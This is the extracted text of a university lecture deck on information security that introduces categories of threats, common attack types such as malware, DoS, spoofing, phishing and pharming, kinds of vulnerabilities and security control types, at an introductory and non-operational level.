CIS2103-Week03-4-CH2_Identify Threats and Vulnerabilities-2.pdf

Full Transcript

CIS 2103 - Principles of Information Assurance, Security and Privacy Chapter 2: Identify Threats and Vulnerabilities (CLO2) 1 2 Credit...

CIS 2103 - Principles of Information Assurance, Security and Privacy Chapter 2: Identify Threats and Vulnerabilities (CLO2) 1 2 Credits and Revision Control Change description: existing material is revised and updated Change level: minor Version Author Effective Date Change Description DRC No 1.0 Unknown NA Define the first version 001 1.1 Dr. Samer Aoudi Fall 2021 (August 2021) Revise the first version 002 1.2 Dr. Abdel-Karim Al-Tamimi Spring 2022 Add examples/animations 003 Revise and Update 004 Dr. Omar Taher Fall 2022 (August 2022) 2.0 3.0 Revise and Update 005 Dr. Waleed Al-Sit Fall 2024(August 2024) 2 3 Delivery Outline W1-2: CH1 - Introduce the Foundation of Information Security (CLO1) W3-4: CH2 - Identify Threats and Vulnerabilities (CLO2) W5-6: CH3 – Apply Cryptography Basics (CLO3) W7: CH4 – Discuss Identity and Access Management (CLO3) W8: CH5 – Identify Software Security Fundamentals (CLO3) W9: CH6 – Discuss Host and Network Security (CLO3) W10-11: CH7 - Apply Basics of Information Security Risk Management (CLO4) W12: CH8 - Apply Basics of Operational Security and Contingency Planning (CLO4) W13: CH9 – Discuss Legal, Ethical and Privacy related Aspects (CLO1) W14-15: Project: Research and Poster Competition: 30% (CLO All) Chapter 2: Identify Threats and Vulnerabilities (CLO2) 5 Chapter Learning Objectives Upon completing this chapter, students will be able to: Identify categories of threats. Discuss various types of attacks. Discuss different types of vulnerabilities. Introduction to security control and mechanisms. Activities: The impact of data breaches 6 Video: Cyber Security - Top 10 Threats – 5 Minutes https://www.youtube.com/watch?v=dVW1FNWSaTg Duration 3:00 7 Video: The Life of a Cyberthreat – 5 Minutes https://www.youtube.com/watch?v=iF8DBpyR23E Duration 3:00 8 Information Security Threats and Attacks Threat: A potential risk to an asset’s loss of value. Attack: An intentional or unintentional act that can damage or otherwise compromise information and the systems that support it. Exploit: A technique used to compromise a system. Vulnerability: A potential weakness in an asset or its defensive control system(s). Management must be informed about the various threats to an organization’s people, applications, data, and information systems. Overall security is improving, but the number of potential hackers is growing. 9 Categories of Threats to InfoSec Threat Category Examples 1. Compromise to Intellectual Property (IP) Piracy (software, music, movies, etc.) 2. Software Attacks Malware (virus, worm, Trojan Horse, ransomware, etc.) 3. Deviations in Quality of Service (QoS) Power outage, ISP connectivity issues, etc. 4. Espionage or Trespass Unauthorized access to premises and/or data 5. Forces of Nature Fire, floods, earthquakes, etc. 6. Human Errors Data entry mistake; accidents; etc. 7. Social Engineering Extortion, blackmail, phishing, etc. 8. Sabotage or Vandalism Destruction or damaging of information assets 9. Theft Stealing information assets 10. Technical Failures (Hardware of Software) Server malfunction (HW); Code bug like buffer overflow (SW) 11. Technological Obsolescence Outdated software (e.g. Adobe Flash, Windows XP, iOS 5.0) 10 Compromises to Intellectual Property Intellectual property (IP): creation, ownership, and control of original ideas as well as the representation of those ideas IP includes trade secrets, copyrights, trademarks, and patents. The most common IP breaches involve software piracy. Two watchdog organizations investigate software abuse: Software and Information Industry Association (SIIA) Business Software Alliance (BSA) According to the BSA, in 2018, approximately 37 percent of software installed on personal computers globally was not properly licensed. 11 Software Attacks Malicious software (malware) is used to overwhelm the processing capabilities of online systems or to gain access to protected systems via hidden means. Software attacks occur when an individual or a group designs and deploys software to attack a system. When an attack makes use of malware that is not yet known by the antimalware software companies, it is said to be a zero-day attack. 12 Deviations in Quality of Service An information system depends on the successful operation of many interdependent support systems. Internet service, communications, and power irregularities dramatically affect the availability of information and systems. Services are usually arranged with a service level agreement (SLA). 13 Espionage or Trespass (1 of 5)-Competitive Intelligence Competitive Intelligence Techniques Definition: Competitive intelligence (CI) involves the ethical and legal collection and analysis of information about competitors, the industry, and the business environment to inform strategic decision-making. Methods: Publicly Available Information: CI relies on gathering information that is publicly accessible. This includes financial reports, press releases, industry publications, company websites, patents, and social media. Market Analysis: CI includes analyzing market trends, customer preferences, and competitor products and services. Surveys and Interviews: Conducting surveys and interviews with customers, suppliers, and other stakeholders. Ethical Standards: Practitioners of CI adhere to a code of ethics, such as those outlined by professional organizations like the Strategic and Competitive Intelligence Professionals (SCIP). 14 Espionage or Trespass (2 of 5)- Industrial Espionage Definition: Industrial espionage, also known as corporate or economic espionage, involves the illegal and unethical acquisition of confidential information from a competitor or business. Methods: Hacking: Unauthorized access to competitors' computer systems to steal proprietary information. Theft: Physically stealing documents, prototypes, or other property. Spying: Using covert methods, such as planting spies within a competitor’s organization or using surveillance techniques. Deception: Engaging in deceit, such as pretending to be someone else to gain access to restricted information. 15 Espionage or Trespass (3 of 5) Access of protected information by unauthorized individuals Competitive intelligence techniques are legal, whereas industrial espionage techniques are not. Shoulder surfing can occur anywhere a person accesses confidential information. Acts of trespass can lead to unauthorized real or virtual actions that enable information gatherers to enter premises or systems without permission. Hackers use skill, guile, or fraud to bypass controls protecting others’ information. 16 Shoulder Surfing 17 Espionage or Trespass (4 of 5) Expert hacker Develops software scripts and program exploits Usually a master of many skills Will often create attack software and share with others Unskilled hackers Many more unskilled hackers than expert hackers Use expertly written software to exploit a system Do not usually fully understand the systems they hack Also known as script kiddies or packet monkeys 18 Espionage or Trespass (5 of 5) Other terms for system rule breakers: Cracker: “cracks” or removes software protection designed to prevent unauthorized duplication. Phreaker: hacks the public telephone system to make free calls or disrupt services. Password attacks Cracking Brute force Dictionary Rainbow tables Social engineering 19 Forces of Nature Forces of nature can present some of the most dangerous threats. They disrupt not only individual lives, but also storage, transmission, and use of information. Threats include fires, floods, earthquakes, lightning, landslides, tornados, hurricanes, tsunamis, ESD, dust contamination, solar activity, civil unrest, and acts of war. Organizations must implement controls to limit damage and prepare contingency plans for continued operations. 20 Human Error or Failure (1 of 2) Includes acts performed without malicious intent or in ignorance Causes include: Inexperience Improper training Incorrect assumptions Employees are among the greatest threats to an organization’s data. 21 Human Error or Failure (2 of 2) Employee mistakes can easily lead to: Revelation of classified data Entry of erroneous data Accidental data deletion or modification Data storage in unprotected areas Failure to protect information Many of these threats can be prevented with training, ongoing awareness activities, and controls. Social engineering uses social skills to convince people to reveal access credentials or other valuable information to an attacker. 22 Sabotage and Vandalism Sabotage: Cyber sabotage involves deliberate actions taken to damage, disrupt, or destroy information systems, networks, or data with the intent to hinder or stop the functioning of an organization, system, or service. Examples: A state-sponsored attack that disrupts a country’s power grid. Malware designed to destroy or disable critical industrial systems (e.g., Stuxnet). Deleting or corrupting essential data to halt business operations. 23 Sabotage and Vandalism Vandalism: Cyber vandalism refers to the willful and malicious defacement, destruction, or disruption of websites, applications, or data. The intent is usually to cause damage, spread a message, or demonstrate hacking skills, without necessarily aiming for strategic disruption. Examples: A hacker defaces a corporate website to display offensive messages. Unauthorized access to a public figure’s social media account to post inappropriate content. Deleting or altering content on a blog or news site. 24 Information Extortion Also known as cyberextortion Attacker steals information from a computer system and demands compensation for its return or nondisclosure Common in credit card number theft 25 Sabotage or Vandalism Threats can range from petty vandalism to organized sabotage. Web site defacing can erode consumer confidence, diminishing an organization’s sales, net worth, and reputation. Threat of hacktivist or cyberactivist operations is rising. Cyberterrorism/cyberwarfare: a much more sinister form of hacking 26 Technical Hardware Failures or Errors They occur when a manufacturer distributes equipment containing a known or unknown flaw. They can cause the system to perform outside of expected parameters, resulting in unreliable service or lack of availability. Some errors are terminal, while others are intermittent. Intel Pentium CPU failure is a notable example. Mean time between failure and annualized failure rates measure hardware failure rates. 27 Technological Obsolescence Antiquated/outdated infrastructure can lead to unreliable and untrustworthy systems. Proper managerial planning should prevent technology obsolescence. 28 Theft It is the illegal taking of another’s physical, electronic, or intellectual property. Physical theft is controlled relatively easily. Electronic theft is a more complex problem; the evidence of crime is not readily apparent. Types of Attacks 30 Understanding Security Attacks There are different types of attacks that try to exploit existing vulnerabilities in our systems Attacks can be categorized by how they are carried out: Using software (e.g. a virus) Physically (e.g. breaking into an office and stealing a laptop) Socially (e.g. tricking someone to give you their password) Attacks can also be categorized by what they target: Technological assets (e.g. hacking a server, laptop, router, etc.) Physical assets (e.g. stealing or damaging a laptop) People (e.g. social engineering) Common attacks: 1. Malware Attacks 2. DoS Attacks (DDoS; Mail Bombing) 3. Network Traffic Attacks (Sniffing; Spoofing; MiTM) 4. Social Engineering (Phishing; Smishing) 5. Pharming 6. Misinformation & Disinformation (Scams and Hoaxes) 7. Spam Email 31 Malware Malware = Malicious Software; in other words, code (scripts, programs) written with the intent to modify, destroy, steal, or deny access to computer systems or information Malware is a category that includes Viruses, Worms, Trojan Horses, Ransomware, active Web scripts, and other types of code: Different types of malware are categorized based on how they work and what they target 32 The Most Dangerous Malware Attacks to Date (1 of 2) Malware Type Year Estimated Number Estimated Financial of Systems Infected Damage CIH, a.k.a. Chernobyl Memory-resident virus 1998 Unknown $250 million Melissa Macro virus 1999 Unknown $300 million to $600 million ILOVEYOU Virus 2000 10% of Internet $5.5 billion Klez (and variants) Virus 2001 7.2% of Internet $19.8 billion Code Red (and CR II) Worm 2001 400,000 servers $2.6 billion Nimda Multivector worm 2001 Unknown Unknown Sobig F Worm 2003 1 million $3 billion SOL Slammer, a.k.a. Worm 2003 75,000 $950 million to $1.2 billion Sapphire 33 Categories of Malware Malware Category Description 1. Virus Virus attaches itself to a file or program. Needs host and human interaction to replicate (e.g. click). 2. Worm Worm replicates and spreads without a host and without human interaction 3. Trojan Horse Trojans disguise themselves as useful programs but include malware 4. Polymorphic Malware Malware (virus, worm, etc.) that constantly changes its identifiable feature. Difficult to detect 5. Backdoor Malware that allows bypassing normal authentication 6. Rootkit Malware that attempts to conceal the existence of malware in the victim host (to avoid detection) 7. Ransomware Malware that holds computers or files for ransom and blackmails the victim to pay money 8. Spyware Malware that collects and sends information from infected computer to attacker 9. Adware Displays advertising popups and banners 10. Logic Bombs Special malware that activates only when certain conditions are met (e.g. on the 9th of July) 11. Botnet A collection of inter-connected devices infected with malware and controlled by a hacker 34 Trojan vs Virus vs Worm Trojan Virus Worm Can replicate itself Can not replicate itself Can replicate itself (propagate through the (locally on the system) network) Uses social engineering to spread Attaches itself to No need to attach itself Malware that disguises existing programs to other programs itself as a good software (self contained) 35 Class Activity – Virus, Worm, and Trojan - 10 Minutes Research the three types of malware and write a paragraph differentiating between them How can people protect against malware? 36 Ransomware Ransomware is a malware attack on the host system that denies access to the user and then offers to provide a key to allow access back to the user’s system and data for a fee. There are two types of ransomware: lockscreen and encryption. Common phishing mechanisms to get a user to download ransomware include pop-ups indicating that illegal information or malware was detected on the user’s system, threatening to notify law enforcement, or offering to delete the offending material if the user clicks a link or button. Ransomware Notification Screen 38 Denial of Service (DoS) Attacks Denial of Service (Dos) attacks target the availability of information or computer systems Attacker sends large number of requests to a target system which becomes busy and unable to handle legitimate service requests Target system may crash or becomes slow Distributed denial-of-service (DDoS) is a type of DoS where a coordinated stream of requests is launched against a target from many locations simultaneously Mail bombing is a type of DDoS where the attacker routes large quantities of e-mail to a target DDoS attacks are often carried out via botnets 39 Dos vs. DDoS Attacker Target Attacker Target 40 Network Traffic Attacks In computer networks, information travel via wired or wireless media from one place to another Attackers can target network traffic (i.e. packets of data) to gain access or steal information Common attacks: Packet Sniffing is the process of monitoring and collecting data packets that pass through a computer network Spoofing is the process of disguising a communication from the hacker as being from a known, trusted source (e.g. ARP Spoofing) MiTM (Man-in-The-Middle) attack is when hackers position themselves in the middle of communication between two nodes (e.g. customer and bank) An attacker monitors network packets, modifies them, and inserts them back into the network They fool one or both thinking it’s the other 41 IP Spoofing Original Packet IP Source: 192.168.24.12 IP Destination: 10.0.0.75 Spoofed Packet IP Source: 10.0.0.80 IP Destination: 10.0.0.75 IP Address: 192.168.24.12 10.0.0.80 10.0.0.75 10.0.0.80 10.0.0.75 Attacker modifies Firewall allows packet Target source IP to spoof the mistaken it for firewall legitimate traffic 42 MiTM Attack MiTM attacker diverts traffic and tricks both users User A thinks they’re User B thinks they’re communicating with communicating with User B User A User A User B 43 Social Engineering Attacks What is the easiest way to get someone’s password? Social Engineering is the art of manipulating people into providing information or a service they otherwise would never have given Using social skills, an attacker tries to convince people to reveal access credentials (passwords) or other valuable information (credit card number; UAE ID; etc.) Why do people fall for trickery? Lack of awareness Human nature to trust Fear (can lead to information extortion and blackmail) Greed Etc. Common attacks: Phishing (trickery via email) Smishing (trickery via SMS) Countermeasures Awareness is the best countermeasure 44 Phishing Fake email sent to thousands of people with links to fake websites or malicious code When victims click the links they either download the malware and their computers get infected, or they go to a fake website where they reveal confidential information Countermeasures: Awareness When not sure, always type the address of the website (e.g. your bank) 45 Phishing: Example 46 Pharming Pharming is the process of redirecting legitimate Web traffic (e.g., browser requests) to illegitimate site for the purpose of obtaining private information This is a technical attack that requires changing a hosts file on a victim's computer or exploiting vulnerable DNS servers Countermeasures (as a user): Always check the URL (address) of the website you visit Verify the identity of the website through its digital certificate www.google.com www.google.com www.evil.com 6.6.6.6 8.8.8.8 6.6.6.6 47 Other Attacks Spam is unsolicited commercial e-mail that we receive on a daily basis from sources we don’t know Spam is more a nuisance than an attack, though is emerging as a vector for some attacks Misinformation is false, inaccurate, or misleading information, regardless of intent Disinformation is knowingly spreading misinformation Misinformation and disinformation allow for Scams and Hoaxes Countermeasures: Awareness: Don’t believe everything you read and don’t help spread hoaxes Fact check information by using reliable sources 48 Class Activity – UAE Law on Misinformation - 10 Minutes Visit the UAE MOJ Laws & Regulations website https://elaws.moj.gov.ae Search for and find Federal Decree Law No. 5 of 2012 Find Article 29 Read and discuss 49 Class Activity – Employees Threats - 10 Minutes Employees are considered among the greatest threats to organization’s information security. Do you agree with this statement? What can organizations do to protect against employees as a threat to information security? Types of Vulnerabilities 51 Types of Vulnerabilities(1 of 3) Vulnerabilities are weaknesses or flaws in a system that can be exploited by attackers to gain unauthorized access or cause damage. Knowing about vulnerabilities helps in protecting systems from potential threats Software Vulnerabilities Flaws, bugs, or weaknesses in software code. Examples: Buffer Overflow: When a program writes more data to a buffer than it can hold, leading to crashes or arbitrary code execution. SQL Injection: Attackers inject malicious SQL code into a database query to manipulate or access data. Cross-Site Scripting (XSS): Attackers inject malicious scripts into web pages viewed by other users.. 52 Types of Vulnerabilities(2 of 3) Hardware Vulnerabilities Weaknesses in physical components of a computer system. Examples: Firmware Exploits: Bugs in firmware that can be exploited for control over hardware. Side-Channel Attacks: Gaining information from the physical implementation of a computer system (e.g., Meltdown and Spectre attacks). Device Theft: Physical theft of devices leading to data breaches. Network Vulnerabilities Weaknesses in the design, implementation, or configuration of a network. Examples: Man-in-the-Middle (MITM) Attacks: Attackers intercept and potentially alter communication between two parties. Denial of Service (DoS) Attacks: Overloading a network with traffic to disrupt services. Weak Encryption Protocols: Using outdated or weak encryption can expose data to interception. 53 Types of Vulnerabilities (3 of 3) Human Vulnerabilities Weaknesses arising from human behavior and actions. Examples: Social Engineering: Manipulating individuals into divulging confidential information (e.g., phishing attacks). Weak Passwords: Using easily guessable passwords that can be cracked. Lack of Awareness: Employees not aware of security policies or best practices. interception. 54 Security Control and Mechanisms: Control Types A security control is a safeguard that is employed within an enterprise to protect the CIA of information and can include the following: Administrative Covers personnel security, risk management, training, permissions, etc. Physical Limit a person’s physical access to assets or facilities, using locks, doors, fences, etc. Example: Infrared monitoring system can detect the presence of an intruder. Technical Also known as logical controls. Implemented in computing environments like operating systems, applications, databases, network devices, etc. Prefer physical or technical controls, as administrative controls require manual enforcement. User *** Administrative Physical Technical 54 55 Summary Information security performs four important functions to ensure that information assets remain safe and useful: Protecting the ability to function; Enabling the safe operation of applications; Protecting data; Safeguarding technology assets Threats to information security come in various types and forms. Threats are not always attacks There are various types of attacks; some are technical, some are physical, and others are social CIS 2103 800 MyHCT (800 69428) www.hct.ac.ae

Use Quizgecko on...
Browser
Browser